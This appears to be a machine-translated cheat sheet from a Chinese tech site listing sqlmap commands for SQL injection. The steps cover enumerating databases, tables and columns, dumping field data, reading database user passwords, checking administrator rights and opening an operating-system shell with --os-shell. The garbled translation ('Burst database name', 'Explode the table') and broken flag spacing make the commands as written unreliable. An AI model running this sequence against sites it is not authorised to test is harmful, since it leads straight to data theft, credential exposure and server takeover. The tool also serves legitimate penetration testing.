Get the App
SLTechnology News&Howtos  ›  Network Security  › 

Sqlmap command

Shulou Source: shulou.com Published: 2022-06-01 06:22:56 10月04日 Update

SQLMAP

Injection of sqlmap.py-u "URL" in GET mode

POST injection sqlmap.py-u "URL"-- data "POST parameter = POST value"

COOKIE injection sqlmap.py-u "URL"-- cookie "cookies value"

Burst database name (cookie according to the actual situation) sqlmap.py-u "URL" [--cookie "cookies value"]-- dbs

Explode the table sqlmap.py-u "URL" [--cookie "cookies value"]-D database name-tables in the target database

Burst target data table field sqlmap.py-u "URL" [--cookie "cookies value"]-D database name-T table name-columns

Export the data of the target field sqlmap.py-u "URL" [--cookie "cookies value"]-D database name-T table name-C field name of the data to be exported, separated by commas-- dump

Reveal how much data there is in the target database sqlmap.py-u "URL" [--cookie "cookies value"]-D database name-count

Detect the current user sqlmap.py-u "URL" [--cookie "cookies value"]-- current-user

Check whether the current user is an administrator sqlmap.py-u "URL" [--cookie "cookies value"]-- is-dba

Detect database user sqlmap.py-u "URL" [--cookie "cookies value"]-- user-v 0

Detect the database user password sqlmap.py-u "URL" [--cookie "cookies value"]-- password-v 0

Detect the current database sqlmap.py-u "URL" [--cookie "cookies value"]-- current-db

Multithreading-threading 5

If we are administrators, we can write Shell.

Operating system Shell write

Sqlmap.py-u "URL" [--cookie "cookies value"]-- os-shell

Tags: Data database detection fields users targets methods administrators management operating systems parameters multiple actual passwords situations numeric values datasheets systems threads commas Apple Docker Huawei Linux macOS MariaDB Microsoft MySQL NVidia OPPO Reno vpn Shulou Information Microsoft MySQL Huawei